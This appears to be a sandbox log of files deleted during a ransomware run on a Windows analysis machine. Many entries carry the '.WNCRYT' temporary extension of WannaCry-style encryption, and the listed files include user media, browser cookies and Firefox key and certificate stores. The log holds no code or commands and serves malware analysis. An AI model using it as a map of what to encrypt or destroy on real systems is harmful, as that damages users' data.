DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
DeletedFile: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
DeletedFile: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
DeletedFile: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
DeletedFile: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\IconCache.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\0.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1025\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1028\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1029\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1030\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1031\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1032\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1033\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1035\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1036\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1037\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1038\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1040\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1041\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1042\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1043\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1044\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1045\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1046\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1049\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1053\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\1055\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\2052\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\2070\eula.rtf
DeletedFile: C:\ba69bdf0a250e352360c33\3082\eula.rtf
DeletedFile: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt
DeletedFile: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt
DeletedFile: C:\Sysmon\sysmonconfig.txt
DeletedFile: C:\Users\All Users\Boxstarter\LICENSE.txt
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
DeletedFile: C:\Users\All Users\chocolatey\CREDITS.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv
DeletedFile: C:\Users\All Users\chocolatey\tools\7zip.license.txt
DeletedFile: C:\Users\All Users\chocolatey\tools\shimgen.license.txt
DeletedFile: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
DeletedFile: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
DeletedFile: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
DeletedFile: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DeletedFile: C:\BOOTSECT.BAK
DeletedFile: C:\ba69bdf0a250e352360c33\header.bmp
DeletedFile: C:\ba69bdf0a250e352360c33\SplashScreen.bmp
DeletedFile: C:\ba69bdf0a250e352360c33\watermark.bmp
DeletedFile: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1
DeletedFile: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1
